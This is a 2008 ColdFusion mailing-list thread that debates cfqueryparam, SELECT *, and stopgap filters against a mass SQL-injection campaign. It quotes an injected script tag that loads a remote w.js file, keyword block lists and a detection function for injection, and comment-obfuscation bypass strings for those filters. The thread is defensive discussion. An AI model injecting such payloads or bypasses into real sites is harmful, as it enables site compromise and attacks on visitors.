hoping someone would give me a reason to believe otherwise, and, as far as production level code is concerned, I'm still not convinced. :) Dave Dear Dave Phillips, you have made a generalisation and I have a dissenting opinion ;O) I use SELECT * for quick and dirty scripts, always have done, always will do. Another way around the error is to change your SQL slightly. Throw in a line break and a different execution plan is used. No it's not ideal, but it works if you come across this problem. Adrian And for those of you who take this advice and DO use cfqueryparam ***always*** make sure you NEVER use SELECT * (which you shouldn't do anyway). I inherited an application that had a ton of SELECT * all over it and no cfqueryparam tags.  Over the years I added cfqueryparam tags as I worked on the application, adding new features, and updated old ones/fixing bugs. Then I ran into a situation.  If I didn't update the SELECT * to include actual column names, and one of the column names got dropped from the table I was referencing in my SELECT query with a cfqueryparam, then BAM, the application would break. Two hard and fast rules to live by: 1.  Use cfqueryparam - ALWAYS 2.  Use SELECT * - NEVER I'm sure someone will now provide some comment as when generalizations are usually made, someone has a dissenting opinion (to which, of course, you are fully entitled!) :) Sincerely, Dave Phillips

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Claude Schneegans
07/24/2008 10:55 AM

>>In our case, what happened was that we dropped a column that hadn't been in use for awhile, and everything broke because of the SELECT * and cfqueryparam. It may be a silly question, but why a SELECT * will brake because an unused column was dropped? -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Jim Wright
07/24/2008 11:12 AM

On Thu, Jul 24, 2008 at 10:52 AM, Claude Schneegans < schneegans@internetique.com> wrote: > > It may be a silly question, but why a SELECT * will brake because an > unused column > was dropped? > > It shouldn't make a difference if the SELECT * is in a cfquery (though that is bad practice, too), but if it is in a view, it will break...such as this example(in SQL Server, at least)... CREATE TABLE tmpTest(foo int,bar int) GO CREATE VIEW tmpView AS SELECT * FROM tmpTest GO SELECT * FROM tmpView  --Works correctly GO ALTER TABLE tmpTest DROP COLUMN bar GO SELECT * FROM tmpView --Throws error

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Claude Schneegans
07/24/2008 11:24 AM

>>It shouldn't make a difference if the SELECT * is in a cfquery I see. A very particular situation though. It will not prevent me from using SELECT * when I need all fields. This is more efficient than list all of them. On the opposite, using SELECT * just to get a record count is the worse case. -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
James Holmes
07/24/2008 11:40 AM

This is not the only case. If you use pooled statements on the datasource (which is a default for CF) you can demonstrate another case: Create a table. Select * from it in a CF template. Add a column to the table in the DB. Run the same template again. See the problem. On Thu, Jul 24, 2008 at 11:20 PM, Claude Schneegans <schneegans@internetique.com> wrote: ----- Excess quoted text cut - see Original Post for more ----- -- mxAjax / CFAjax docs and other useful articles: http://www.bifrost.com.au/blog/

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Jim Wright
07/24/2008 02:22 PM

On Thu, Jul 24, 2008 at 11:20 AM, Claude Schneegans < schneegans@internetique.com> wrote: > A very particular situation though. Perhaps, but the following demonstrates how this kind of issue can be even more problematic when the table is changed in such a way that no error is thrown by the view... CREATE TABLE tmpTest(foo1 int,bar2 int) GO INSERT INTO tmpTest VALUES(1,2) GO CREATE VIEW tmpView AS SELECT * FROM tmpTest GO SELECT * FROM tmpView --Note the column names and the associated values GO ALTER TABLE tmpTest DROP COLUMN foo1 GO ALTER TABLE tmpTest ADD foo1 int GO UPDATE tmpTest SET foo1 = 1 SELECT * FROM tmpView --Note the column names and the associated values (and no error being thrown)

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Kris Jones
07/21/2008 06:21 PM

As a rule I use cfqueryparam. And generally try to stick to stored procedures, and use cfstoredproc/cfprocparam. However, I am now working with an app that uses cached queries regularly, and is still on CF7. You cannot use cfqueryparam with a cached query in CF7. What are the alternatives? -KJ > Bottom line: ***always*** use cfqueryparam.  Period.  There are no > acceptable "exceptions to the rule".

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Claude Schneegans
07/21/2008 09:40 PM

>>Bottom line: ***always*** use cfqueryparam.  Period.  There are no acceptable "exceptions to the rule". Even with something like UPDATE myTable  SET myDate =  <cfqueryparam value = "#now()#" CFSQLType = "CF_SQL_TIMESTAMP">? OR this: UPDATE myTable  SET myValue =  <cfqueryparam value = "#someOtherQuery.someOtherValue#"  CFSQLType = "CF_SQL_INTEGER ">? Just ridiculous. OK, it "improves performance", if you care about micro seconds, but there is no security aspect here. The increase of performance can make a significant difference only for very big queries or very repetitive code. As the docs says: "Bind variable usage enhances performance when executing a cfquery statement multiple times." Otherwise, the advantage is only for security purpose,... and there is a risk only for variables set by a visitor. If the content is set by your CF program itself, where is the risk? It is like putting a lock on an empty box. Personally, I care mode about code readability than useless security. -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Mark Kruger
07/21/2008 10:07 PM

Regarding performance... On high traffic sites with a good SQL server cfqueryparam can result in 10 to sometimes as much as 40 percent performance increase - especially if your SQL server is finely tuned  and has good indexing and schema practices. In addition, I don't find the queries less readable. In fact, the extra attribute information tells me more about the schema without having to look up the tables. The use of snippets means it takes no time at all to use them. In short, I can find no legitimate reason to NOT use cfqueryparam. Your arguments below lead to code that is simply unnecessarily inconsistent. -mark Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com >>Bottom line: ***always*** use cfqueryparam.  Period.  There are no acceptable "exceptions to the rule". Even with something like UPDATE myTable  SET myDate =  <cfqueryparam value = "#now()#" CFSQLType = "CF_SQL_TIMESTAMP">? OR this: UPDATE myTable  SET myValue =  <cfqueryparam value = "#someOtherQuery.someOtherValue#"  CFSQLType = "CF_SQL_INTEGER ">? Just ridiculous. OK, it "improves performance", if you care about micro seconds, but there is no security aspect here. The increase of performance can make a significant difference only for very big queries or very repetitive code. As the docs says: "Bind variable usage enhances performance when executing a cfquery statement multiple times." Otherwise, the advantage is only for security purpose,... and there is a risk only for variables set by a visitor. If the content is set by your CF program itself, where is the risk? It is like putting a lock on an empty box. Personally, I care mode about code readability than useless security. -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Gerald Guido
07/21/2008 10:28 PM

Always sanitize your data entry. http://xkcd.com/327/ Performance is a moot point when you have to sanitize/rebuild your entire database cuz  you got hacked. Besides shouldn't you be abstracting you database layer and using cfqueryparam in your CFC's as a matter of habit? Not dissing anyone. Just curious. With all the ORM's and code generators out there, why are you not using cfqueryparam? Seriously, CFC Generator saved my ass with this hack attack. Thanx Brian! ~G~ ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Mary Jo Sminkey
07/23/2008 11:18 AM

>Not dissing anyone. Just curious. With all the ORM's and code generators out >there, why are you not using cfqueryparam? One reason I can think of is that until recently you could not use it with cached queries. For those of us that have to support older versions of ColdFusion, it's definitely a dilemma in terms of trying to provide the often considerable performance benefit that caching provides while not being able to use cfqp. It's relatively easy to sanitize numeric inputs with a Val() function but strings are a bit harder to deal with...as this has shown.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Adrian Lynch
07/24/2008 09:42 AM

Ok, I understand why you think it's ridiculous, but here's a reason to do it. What if you have: UPDATE myTable SET myValue = #someOtherQuery.someOtherValue# and Billy New-Developer comes along and decides that someOtherQuery.someOtherValue could really do with coming directly from the user? Will he add the cfqp if it's not already there? Maybe, maybe not. Having said that, I have queries that aren't cfqp'd because the data comes from in the page. Just a though. Adrian >>Bottom line: ***always*** use cfqueryparam.  Period.  There are no acceptable "exceptions to the rule". Even with something like UPDATE myTable  SET myDate =  <cfqueryparam value = "#now()#" CFSQLType = "CF_SQL_TIMESTAMP">? OR this: UPDATE myTable  SET myValue =  <cfqueryparam value = "#someOtherQuery.someOtherValue#"  CFSQLType = "CF_SQL_INTEGER ">? Just ridiculous. OK, it "improves performance", if you care about micro seconds, but there is no security aspect here. The increase of performance can make a significant difference only for very big queries or very repetitive code. As the docs says: "Bind variable usage enhances performance when executing a cfquery statement multiple times." Otherwise, the advantage is only for security purpose,... and there is a risk only for variables set by a visitor. If the content is set by your CF program itself, where is the risk? It is like putting a lock on an empty box. Personally, I care mode about code readability than useless security.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Claude Schneegans
07/24/2008 09:57 AM

>>and Billy New-Developer comes along and decides that someOtherQuery.someOtherValue could really do with coming directly from the user? Will he add the cfqp if it's not already there? This is irrelevant, because: 1. if both fields are numeric, there is no possibility OtherQuery.someOtherValue can     contain anything harmful; 2. if both fields are text, CFQUERYPARAM won't detect anything harmful and won't help anyway. 3. if both fields have different types, then you should have fire your db administrator, or      your developer, or both, a long time ago ;-)     in this case, the least you should do is to check the compatibility of values BEFORE running the query,     and eventually make the appropriate conversion. -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Adrian Lynch
07/24/2008 10:13 AM

But Billy has been told to turn: SET myValue = #someOtherQuery.someOtherValue# into: SET myValue = #FORM.someOtherValue# because Nigel in accounts wants to do his own thing. If cfqp is in place, Billy will leave it there. He might not add it if it's not! Poor Billy... >>and Billy New-Developer comes along and decides that someOtherQuery.someOtherValue could really do with coming directly from the user? Will he add the cfqp if it's not already there? This is irrelevant, because: 1. if both fields are numeric, there is no possibility OtherQuery.someOtherValue can     contain anything harmful; 2. if both fields are text, CFQUERYPARAM won't detect anything harmful and won't help anyway. 3. if both fields have different types, then you should have fire your db administrator, or      your developer, or both, a long time ago ;-)     in this case, the least you should do is to check the compatibility of values BEFORE running the query,     and eventually make the appropriate conversion. -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Claude Schneegans
07/24/2008 10:46 AM

>>But Billy has been told to turn: SET myValue = #someOtherQuery.someOtherValue# into: SET myValue = #FORM.someOtherValue# Then obviously, he should add CFQP to the line of code in the same time, what's the problem? My point is just that in some situations, CFQP is useless, of course, is you change your code, then it is a new code, with a new situation. I don't see your argument. Would you also use CFLOCK around CFSET of any variable, just in case some variable is moved to the session scope some day? (in CF5 for this example)? C'mon... ;-) -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
James Holmes
07/24/2008 10:14 AM

Do you fully understand what cfqueryparam does when binding text parameters into the query? On Thu, Jul 24, 2008 at 9:54 PM, Claude Schneegans <schneegans@internetique.com> wrote: > 2. if both fields are text, CFQUERYPARAM won't detect anything harmful > and won't help anyway. -- mxAjax / CFAjax docs and other useful articles: http://www.bifrost.com.au/blog/

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Claude Schneegans
07/24/2008 11:01 AM

>>Do you fully understand what cfqueryparam does when binding text parameters into the query? Yes, fully. I've designed CFX_ODBCinfo, and some other tools, and I'm pretty aware of the way ODBC or JDBC drivers work. This is precisely why I can say when it is useful and when it is not. -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Adrian Lynch
07/24/2008 11:11 AM

Try telling that to Billy, he just got fired! >>Do you fully understand what cfqueryparam does when binding text parameters into the query? Yes, fully. I've designed CFX_ODBCinfo, and some other tools, and I'm pretty aware of the way ODBC or JDBC drivers work. This is precisely why I can say when it is useful and when it is not.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
James Holmes
07/24/2008 11:43 AM

So you know that it *always* prevents SQL injection in a standard query (select, update or delete). That's a good enough reason to always use it for me. On Thu, Jul 24, 2008 at 10:58 PM, Claude Schneegans <schneegans@internetique.com> wrote: ----- Excess quoted text cut - see Original Post for more ----- -- mxAjax / CFAjax docs and other useful articles: http://www.bifrost.com.au/blog/

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Claude Schneegans
07/24/2008 11:48 AM

>>So you know that it *always* prevents SQL injection in a standard query (select, update or delete). Really? Can you give an example of injection that will be prevented? -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
James Holmes
07/24/2008 11:59 AM

I'll say it again. ANY string passed into cfqueryparam cannot be executed as SQL: select somecolumn from sometable where someothercolumn = <cfqueryparam cfsqltype="varchar" value="URL.TryToHackThis"> It is irrelevant what gets passed in the URL.TryToHackThis; it cannot be executed as a SQL statement. It's bound to the query as a parameter. On Thu, Jul 24, 2008 at 11:44 PM, Claude Schneegans <schneegans@internetique.com> wrote: >  >>So you know that it *always* prevents SQL injection in a standard > query (select, update or delete). > > Really? Can you give an example of injection that will be prevented? -- mxAjax / CFAjax docs and other useful articles: http://www.bifrost.com.au/blog/

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
James Holmes
07/24/2008 12:00 PM

Obviously cfsqltype="varchar" should be cfsqltype="cf_sql_varchar" (my typo). On Thu, Jul 24, 2008 at 11:55 PM, James Holmes <james.holmes@gmail.com> wrote: ----- Excess quoted text cut - see Original Post for more ----- -- mxAjax / CFAjax docs and other useful articles: http://www.bifrost.com.au/blog/

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
James Holmes
07/24/2008 12:08 PM

Jeez, and value="URL.TryToHackThis" should be value="#URL.TryToHackThis#" That's what I get for answering at midnight. On Thu, Jul 24, 2008 at 11:57 PM, James Holmes <james.holmes@gmail.com> wrote: ----- Excess quoted text cut - see Original Post for more ----- -- mxAjax / CFAjax docs and other useful articles: http://www.bifrost.com.au/blog/

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Claude Schneegans
07/24/2008 12:18 PM

>>Jeez, and value="URL.TryToHackThis" should be value="#URL.TryToHackThis#" ... so you see that CFQP is not that easy to use ;-)) -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Claude Schneegans
07/24/2008 12:17 PM

>>ANY string passed into cfqueryparam cannot be executed as SQL: Is it really possible to get an SQL statement executed from a string for a text field without closing the string first with an apostrophe? -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Brad Wood
07/24/2008 12:26 PM

Closing the apostrophe is exactly how SQL injection occurs with text field and if you are using MySQL it is a very real possibility. ~Brad > >>ANY string passed into cfqueryparam cannot be executed as SQL: > > Is it really possible to get an SQL statement executed from a string for > a text field > without closing the string first with an apostrophe?

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Claude Schneegans
07/24/2008 12:36 PM

>>Closing the apostrophe is exactly how SQL injection occurs with text field Ok, you got it! BUT CFQUERY will escape that apostophe anyway, so that the SQL injection will just be part of the string stored in the field either you use CFQP or not. -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Brad Wood
07/24/2008 12:42 PM

Not if you use MySQL.  That DBMS allows for an alternative way to escape those with a backslash. This has been a much blogged topic recently. http://www.codersrevolution.com/index.cfm/2008/7/13/Just-when-you-felt-safe-SQL-Injection-and-MySQL http://www.coldfusionmuse.com/index.cfm/2008/2/22/sql-injection-on-a-character-field http://www.coldfusionmuse.com/index.cfm/2008/5/16/disable-backslash-escape-on-mysql This is the technicality I was citing when I disagreed with Dave Watts the other day about calling stored procs inline. If you have a cfquery and a character field enclosed in single ticks and you haven't turned off MySQL's default ways of escaping those ticks, you CAN GET HACKED if you are not using cfqueryparam. I've demonstrated a working example on the first link I provided. ~Brad ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Claude Schneegans
07/24/2008 01:02 PM

>>Not if you use MySQL.  That DBMS allows for an alternative way to escape those with a backslash. Ok, then lets say that CFQP should alway be used with MySQl... >>.. and you haven't turned off MySQL's default ways of escaping those ticks .. IF you have not turn off MySQL's default ways of escaping those ticks. Anyway, IMHO letting MySQL escape anything like \b to a backspace character or \r as a carriage return is asking for trouble. Look at the possibility of messing up directory names stored in the database, unless you escape all backslashes yourself, a PITA, CF won't do it for you. -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Brad Wood
07/24/2008 01:46 PM

That's fair enough from a security stand point, but I still use cfqueryparam with MS SQL for performance reason. When your database executes a SQL statement, it generates an execution plan that best fits that statement and it caches that plan in memory for later use (so it doesn't have to be generated again which is costly). The cached execution plan will ONLY be used for other queries that are the EXACT same. Keep in mind also that your database server has a limit to how many plans it will cache. If you output an order number directly into the query and then view different 100,000 orders, your SQL server will try and cache 100,000 different plans. Select order_id From orders Where order_id = 1 Select order_id From orders Where order_id = 2 Select order_id From orders Where order_id = 3 Select order_id From orders Where order_id = 4 etc... Needless to say, that is a waste of resources, and it won't keep that many plans anyway. Chances are, other useful plans will get pushed out of memory to make room. However, if all your inputs are parameterized, then all those SQL statements are now IDENTICAL and share the same plan: Select order_id From orders Where order_id = (param) This single plan can be reused for all 100,000 orders which means other queries won't have their plans purged out of memory. There is a valid discussion about the use of non-optimal plan, but as a general rule, I wouldn't let that stop you from the best practice. ~Brad > Ok, then lets say that CFQP should alway be used with MySQl...

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Claude Schneegans
07/24/2008 01:54 PM

>>When your database executes a SQL statement, it generates an execution plan that best fits that statement and it caches that plan in memory for later use. Ok, this is another example where CFQP is useful, as the doc says. But if the query is not likely to be executed often, which is the case with small sites, generating the execution plan might represent an overhead on the contrary. (just assuming, I have not run tests, and I don't really care ;-) Understand me correctly, I never said that CFQP is NEVER useful, I just don't like ayatollah statements like SHOULD *always*! -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Claude Schneegans
07/21/2008 10:01 PM

>>For those of you who are actually trying to learn and become better programmers/developers, I used to be a teacher myself, and I never agreed with this way of teaching beginners to do things mechanically without thinking about the reasons and the pros and cons. If you teach beginners to act this way, they will remain beginners all their live. -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Dave Watts
07/21/2008 04:40 PM

> What other ways are there? I know of two: EXEC and EXECUTE. Some people already mentioned sp_executesql, which is the preferred approach nowadays. But what about Unicode character conversion? What about from the shell using sp_cmdshell to fetch batch files remotely and execute them with isql/osql? For all I know, there may be other approaches as well. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information!

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Dave Watts
07/21/2008 05:25 PM

----- Excess quoted text cut - see Original Post for more ----- If you use it systematically for every parameter, you won't have any "forgotten" pages. Besides, again, it provides benefits beyond validation, such as potentially improving the reuse of execution plans. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information!

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Brad Wood
07/21/2008 06:24 PM

Hmm, I sure hope you replaced the exec with a print statement.... Brad, This took care of part of the issue... but not all. I get this error: Msg 8152, Level 16, State 13, Line 1 String or binary data would be truncated. The statement has been terminated. Does anyone know what I need to do to get around the error above? thanks! >Works great for me.  You have to remove the extra line breaks though.

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Brad Wood
07/21/2008 06:26 PM

Cache result sets manually.  You can wrap that up nicely in a custom tag. ~Brad I am now working with an app that uses cached queries regularly, and is still on CF7. You cannot use cfqueryparam with a cached query in CF7. What are the alternatives?

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Dave Watts
07/21/2008 08:06 PM

> We are going to be reading about this on all the tech rags > like Info World and Zdnet tomorrow. It was in those a week or two ago, already. This is not new. Originally, it primarily targeted "classic" ASP apps. HP released a free vulnerability scanner called Scrawlr in response. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information!

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Dan Vega
07/21/2008 08:33 PM

Firewall solution is another way, we block anything in the url with CAST( OR EXEC( Thank You Dan ----- Excess quoted text cut - see Original Post for more -----

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Bo Reahard
07/23/2008 07:21 PM

On 7/23/2008 at about 1:30 I had a second sql injection attack. On 7/21/2008 I had fixed the database for this site from the first attack and I had fixed all the cfqueries with the proper cfquery param tags and included <cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR cgi.QUERY_STRING contains "EXEC("><cfabort></cfif> in my application.cfm file. Today the code inserted was a little different, it was "></title><script src="http://abc.verynx.cn/w.js"></script>; - is this attack still going on? How does it defeat the cfquery param tags that are now in all my queries?

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Brad Wood
07/23/2008 07:51 PM

If you are still being affected by the attack, then you still have one or more vulnerable queries somewhere with access to that database. Did you use a code scanner like QueryParam Scanner from RiaForge to search the ENTIRE code base for missing cfqueryparams? Also, find out the user your ColdFusion data sources use to access the database.  Revoke select permissions to sysobjects and syscolumns to that user. This will cause an error to occur when the attack hits a vulnerable query. (Run a test to confirm this) Do you have a site-wide error handler that E-mails you when errors occur.  This will tip you off to where the hackers are gaining entry. ~Brad   How does it defeat the cfquery param tags that are now in all my queries?

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Radek Valachovic
07/23/2008 08:33 PM

What about if I put: <cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR cgi.QUERY_STRING contains "EXEC("><cfabort></cfif> in my all cf files on my web site and if hacker gonna try to run any of this files for example: index.cfm?+code, mail.cfm?+code etc basically it attacks all on google indexed, but if u put in all of the files, it should abort the connection everytime when one files is executed and tehn any query wont be executed....it should work...what do you think? Radek ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Mark Kruger
07/23/2008 09:52 PM

Excuse me... But why are you checking script_name and Path_info for "EXEC(" ... Both of these are generated on the web server - not sent by the browser... So I'd be interested to know your reasoning. Also, form elements are not part of the "query_string" since they are passed in a form "body" container separate from the header. If you are looking for a stop gap try the isSQLInject function on cflib.org (and make sure you add declare, cast and exec to the list). I posted a snippet on my blog that uses this UDF like so: <!--- check the URL scope ---> <cfif isDefined('url')>    <cfloop collection="#url#" item="uItem">       <cfif isSQLInject(url[uITem])>          <Cfabort>     ... Or whatever action you want.       </cfif>    </cfloop>       </cfif> <!--- check the FORM scope ---> <cfif isDefined('form')>    <cfloop collection="#form#" item="fItem">       <cfif isSQLInject(form[fITem])>          <Cfabort>     ... Or whatever action you want       </cfif>    </cfloop>       </cfif> Of course if you use cookies inside of queries, or copy stuff to the request or attributes scope (a la fusebox 2-3) then you might need additional iterations. In my opinion this is a stop gap measure and should not be used to 'stand in' for not using bound variables and actual validation routines based on the form being submitted or url being fetched. You should still redress the issues with your code in spite of measures like this one. In addition - looping through available user input scopes can be expensive and it can result in false positives. If someone submits a comment in a forum that says they are "Casting about for a solution" or that they "declare the issue resolved" then these items will be trapped unecessarily by the code above. If the vars are properly bound however, they will be safely inserted into the DB as part of the comments. -Mark =========== here's the modified UDF =========== <cfscript> /** * Tests a string, one-dimensional array, or simple struct for possible SQL injection. * * @param input    String to check. (Required) * @return Returns a boolean. * @author Will Vautrain (vautrain@yaho& #111;.com) * @version 1, July 1, 2002 */ function IsSQLInject(input) {   var listSQLInject = "cast,exec,execute,sp_executeSQL,revoke,grant,select,insert,update,delete,dr op,--,'";   var arraySQLInject = ListToArray(listSQLInject);   var i = 1;      for(i=1; i lte arrayLen(arraySQLInject); i=i+1) {     if(findNoCase(arraySQLInject[i], input)) return true;   }      return false; } </cfscript>

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Gabriel
07/23/2008 10:53 PM

With this latest spate of SQL attacks it has at least alerted CF (and non CF coders hopefully) to the importance of sql injection and input sanitisation. However I am noticing that almost all of the drop-in 'patches', almost all of them seem to be straight list/array searches and there is almost no use of regular expressions, meaning that these 'solutions' can barely even be considered as suitable stop gaps until more appropriate measures can be taken (cfqueryparam, sql permissions, etcetera) as they really can only stop the most basic attempts and are likely to produce an inordinate number of false positives (someone earlier noted that an admin was blacklisted for using declare in a perfectly acceptable context). It seems to me that such a knee jerk reaction and placing half thought out measures in place almost does more harm than good in that it leaves people with a false sense of security. Take the following code as case in point; function IsSQLInject(input) {   var listSQLInject = "cast,exec,execute,sp_executeSQL,revoke,grant,select,insert,update,delete,dr op,--,'";   var arraySQLInject = ListToArray(listSQLInject);   var i = 1;      for(i=1; i lte arrayLen(arraySQLInject); i=i+1) {     if(findNoCase(arraySQLInject[i], input)) return true;   }      return false; } Running this function over any user input scope will flag every input that contains one of the listed strings, i.e. 'Casting sugar', 'selectable criteria', 'Name: Grant Thompson', so on and so forth... But at least you're secure, right? Dr/*foo*/op table orders; The simplest obfuscation of the command using basic tools and the function is rendered useless. Conclusion? You're stopping legitimate use and still leaving a wide open door to any hacker willing to put in 30 seconds effort. How long until someone rewrites the current attack pattern and uses the above method to bypass all of the shiny new keyword scanners? Dec/*can't see me*/lare @s = ... That's all without even touching upon encoding. I'm not claiming to have the ideal patch, I'm not even claiming to have been the first to notice these things - posts are on many CF blogs detailing these issues in a far more articulate manner, but I think that advocating simple keyword scanners in this list is irresponsible, bad advice can be worse than no advice at all. All 'senior' CF programmers either do, or should know better. Please note that I mean no offence to anyone on this list (or anywhere else for that matter). Regards, Gabriel

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Mark Kruger
07/23/2008 11:17 PM

Gabriel, Can you give me a rundown on how a sting like "dr/*foo*/op" would translate as drop? Trying this in query analyzer does not seem  to work. se/*foo*/lect * from users where archivebit = 1 order by firstname Doesn't work... So I created a table called foo and then ran this query like your example: dr/*foo*/op table foo  - still no dice I've never seen successful syntax like that used in t-sql. The function code does indeed generate false positives and it is a stop gap to be sure... But I'm not so sure getting around it is as easy as you seem to indicate. Perhaps using inline comments is a method used against a different platform? I'd be interested to find out. Moreover, the point has been made "responsibly" over and over and over again that these measures and NOT the fix - simply a way to stem the tide temporarily while a defense (hopefully a defense in depth) is implemented. Most of the folks on here who have been victimized by this malicious code need a way to stop THIS attack while they finally get their code in order... That's the purpose of these stop gap measures. Yes it's true the next attack might step right over them - but these poor site owners need get a  breather so they can make those other more important necessary changes. That's real world in the trenches... No one is advocating this sanitizing function as a panacea - mearly another arrow in the quiver. My suggestion to you is that since you feel you have a better mouse trap, rather than just pepper the list with pendantic 